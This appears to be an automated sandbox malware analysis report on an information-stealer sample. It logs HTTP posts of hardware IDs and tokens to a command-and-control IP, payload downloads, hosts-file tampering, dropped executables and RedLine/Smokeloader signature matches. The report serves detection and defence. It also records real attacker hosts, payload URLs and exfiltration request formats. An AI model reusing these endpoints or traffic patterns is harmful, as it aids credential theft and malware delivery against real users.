67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 46 49 49 49 45 48 43 46 48 4a 4b 46 48 44 48 44 41 2d 2d 0d 0a Data Ascii: ------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------JEBFIIIEHCFHJKFHDHDAContent-Disposition: form-data; name="message"ybncbhylepme------JEBFIIIEHCFHJKFHDHDA--
Source: global traffic	HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDAAECAEBKJKFHJKECFHost: 45.91.200.39Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 35 61 30 65 34 63 66 37 38 36 64 36 30 35 64 38 33 32 62 39 65 36 66 65 38 31 63 65 64 39 34 33 38 66 64 63 65 31 38 33 32 36 31 33 65 39 35 30 63 35 36 31 33 61 30 38 36 30 65 34 33 31 38 64 66 35 61 36 39 38 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 41 41 45 43 41 45 42 4b 4a 4b 46 48 4a 4b 45 43 46 2d 2d 0d 0a Data Ascii: ------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="token"615a0e4cf786d605d832b9e6fe81ced9438fdce1832613e950c5613a0860e4318df5a698------EHDAAECAEBKJKFHJKECFContent-Disposition: form-data; name="message"wkkjqaiaxkhb------EHDAAECAEBKJKFHJKECF--

Source: Joe Sandbox View

IP Address: 87.106.236.48 87.106.236.48

Source: Joe Sandbox View

ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL ON-LINE-DATAServerlocation-NetherlandsDrontenNL

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49730 -> 45.91.200.39:80
Source: Network traffic	Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49731 -> 87.106.236.48:443

Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39
Source: unknown	TCP traffic detected without corresponding DNS query: 45.91.200.39

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_00405000 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetOpenUrlA,InternetReadFile,memcpy,InternetCloseHandle,InternetCloseHandle,

0_2_00405000

Source: global traffic	HTTP traffic detected: GET /tmpp/chrome_131.exe HTTP/1.1Host: gosp.clinicavertigen.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.91.200.39Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /cb9cc10e175e1537/sqlite3.dll HTTP/1.1Host: 45.91.200.39Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: gosp.clinicavertigen.com
Source: global traffic	DNS traffic detected: DNS query: 198.187.3.20.in-addr.arpa

Source: unknown

HTTP traffic detected: POST /eaa194fa594ff9c2.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFCFHJJECAEHJJKEHIDBHost: 45.91.200.39Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 38 31 33 30 44 37 38 38 45 43 32 32 37 33 38 34 38 33 30 38 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 41 46 43 46 48 4a 4a 45 43 41 45 48 4a 4a 4b 45 48 49 44 42 2d 2d 0d 0a Data Ascii: ------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="hwid"E68130D788EC2273848308------AFCFHJJECAEHJJKEHIDBContent-Disposition: form-data; name="build"LogsDiller------AFCFHJJECAEHJJKEHIDB--

Source: b4s45TboUL.exe, 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://45.91.200.39
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.91.200.39/
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.91.200.39/4e
Source: b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://45.91.200.39/cb9cc10e175e1537/sqlite3.dll
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.91.200.39/cb9cc10e175e1537/sqlite3.dllqKo
Source: b4s45TboUL.exe, 00000000.00000002.2105869002.0000000021011000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://45.91.200.39/eaa194fa594ff9c2.php
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.91.200.39/eaa194fa594ff9c2.php1f9a9c4a2f8b514.cdf-ms
Source: b4s45TboUL.exe, 00000000.00000002.2105869002.0000000021011000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.91.200.39/eaa194fa594ff9c2.php4
Source: b4s45TboUL.exe, 00000000.00000002.2105869002.0000000021011000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.91.200.39/eaa194fa594ff9c2.phpp
Source: b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://45.91.200.39/eaa194fa594ff9c2.phpsition:
Source: b4s45TboUL.exe, 00000000.00000003.1764389556.00000000009FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.91.200.39/eaa194fa594ff9c2.php~1.d
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://45.91.200.396
Source: b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://45.91.200.39FHDHDA
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiC
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.0000000000A37000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: b4s45TboUL.exe, 00000000.00000002.2103193052.000000001AF68000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: b4s45TboUL.exe, b4s45TboUL.exe, 00000000.00000002.2106640783.000000006D001000.00000002.00000001.01000000.00000007.sdmp, b4s45TboUL.exe, 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000003.1686239349.0000000002570000.00000004.00001000.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gosp.clinicavertigen.com/
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gosp.clinicavertigen.com/#
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.000000000095E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gosp.clinicavertigen.com/-
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gosp.clinicavertigen.com/pData
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gosp.clinicavertigen.com/tmpp/chrome_131.exe
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gosp.clinicavertigen.com/tmpp/chrome_131.exeac
Source: b4s45TboUL.exe, 00000000.00000002.2090541481.00000000009A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://gosp.clinicavertigen.com/tmpp/chrome_131.exen
Source: b4s45TboUL.exe, 00000000.00000003.1761148911.0000000020EF1000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Ed1aWxkV
Source: b4s45TboUL.exe, 00000000.00000003.1761148911.0000000020EF1000.00000004.00000020.00020000.00000000.sdmp, b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: b4s45TboUL.exe, 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17mluIFdhbGxldHxmbmpobWtoaG1rYm
Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: b4s45TboUL.exe, 00000000.00000003.1764300248.0000000000A14000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443

Source: unknown

HTTPS traffic detected: 87.106.236.48:443 -> 192.168.2.4:49731 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\ProgramData\HIIDGCGCBF.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_00409E30 memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,

0_2_00409E30

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2091006922.0000000002330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2091301864.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

PE file contains section with special chars

Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: HIIDGCGCBF.exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: chrome_131[1].exe.0.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:
Source: updater.exe.4.dr	Static PE information: section name:

Uses powercfg.exe to modify the power settings

Source: C:\ProgramData\HIIDGCGCBF.exe

Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

Source: C:\Users\user\Desktop\b4s45TboUL.exe

Code function: 0_2_6CFE0DE0 NtWriteFile,WaitForSingleObject,RtlNtStatusToDosError,

0_2_6CFE0DE0

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFEEC60	0_2_6CFEEC60
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFC9DF1	0_2_6CFC9DF1
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFA5DB0	0_2_6CFA5DB0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFCFDA0	0_2_6CFCFDA0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFDED70	0_2_6CFDED70
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFBCEB0	0_2_6CFBCEB0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFC8E00	0_2_6CFC8E00
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFE5F20	0_2_6CFE5F20
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFCD8F0	0_2_6CFCD8F0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFCF8E0	0_2_6CFCF8E0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFC88A0	0_2_6CFC88A0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFE390E	0_2_6CFE390E
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFE8BE0	0_2_6CFE8BE0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFE4BC0	0_2_6CFE4BC0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFB85E0	0_2_6CFB85E0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFE15E0	0_2_6CFE15E0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFA257C	0_2_6CFA257C
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFEE680	0_2_6CFEE680
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFA27E0	0_2_6CFA27E0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFEA7D1	0_2_6CFEA7D1
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFD1758	0_2_6CFD1758
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFFD735	0_2_6CFFD735
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFB40D0	0_2_6CFB40D0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFCF1D0	0_2_6CFCF1D0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFA6170	0_2_6CFA6170
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFB82C0	0_2_6CFB82C0
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFE2290	0_2_6CFE2290
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFF13D6	0_2_6CFF13D6
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_6CFFF340	0_2_6CFFF340
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61EAD2AC	0_2_61EAD2AC
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E4B8A1	0_2_61E4B8A1
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E75F1F	0_2_61E75F1F
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E40065	0_2_61E40065
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E9E24F	0_2_61E9E24F
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E62554	0_2_61E62554
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E9A4A7	0_2_61E9A4A7
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E4E4BF	0_2_61E4E4BF
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E94783	0_2_61E94783
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E7A790	0_2_61E7A790
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E18736	0_2_61E18736
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E86668	0_2_61E86668
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E58670	0_2_61E58670
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E6667F	0_2_61E6667F
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61EA0BA9	0_2_61EA0BA9
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E62CA3	0_2_61E62CA3
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E98FE2	0_2_61E98FE2
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E88FCA	0_2_61E88FCA
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E52F80	0_2_61E52F80
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61EA2F47	0_2_61EA2F47
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E56F18	0_2_61E56F18
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E4CEF9	0_2_61E4CEF9
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E1EEFF	0_2_61E1EEFF
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61EA91F6	0_2_61EA91F6
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E651DD	0_2_61E651DD
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E9316A	0_2_61E9316A
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E9F0ED	0_2_61E9F0ED
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61EA70CF	0_2_61EA70CF
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E9D0C3	0_2_61E9D0C3
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E8D0B6	0_2_61E8D0B6
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E6904E	0_2_61E6904E
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E4304E	0_2_61E4304E
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E15337	0_2_61E15337
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E672DC	0_2_61E672DC
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E19208	0_2_61E19208
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E534E3	0_2_61E534E3
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E77452	0_2_61E77452
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: 0_2_61E37930	0_2_61E37930

Source: Joe Sandbox View	Dropped File: C:\ProgramData\Google\Chrome\updater.exe 0CF1E07D9FF27240D711390121E4EA7EB6F84E3C150AE9BB6D860E2819AD61E5
Source: Joe Sandbox View	Dropped File: C:\ProgramData\HIIDGCGCBF.exe 0CF1E07D9FF27240D711390121E4EA7EB6F84E3C150AE9BB6D860E2819AD61E5
Source: Joe Sandbox View	Dropped File: C:\ProgramData\chrome.dll 81A4F37C5495800B7CC46AEA6535D9180DADB5C151DB6F1FD1968D1CD8C1EEB4

Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: String function: 6CFFFDB0 appears 39 times
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: String function: 00404610 appears 317 times
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: String function: 6CFF1380 appears 33 times
Source: C:\Users\user\Desktop\b4s45TboUL.exe	Code function: String function: 6CFED850 appears 70 times

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 6556 -ip 6556

Source: chrome_131[1].exe.0.dr	Static PE information: Number of sections : 14 > 10
Source: updater.exe.4.dr	Static PE information: Number of sections : 14 > 10
Source: HIIDGCGCBF.exe.0.dr	Static PE information: Number of sections : 14 > 10

Source: b4s45TboUL.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

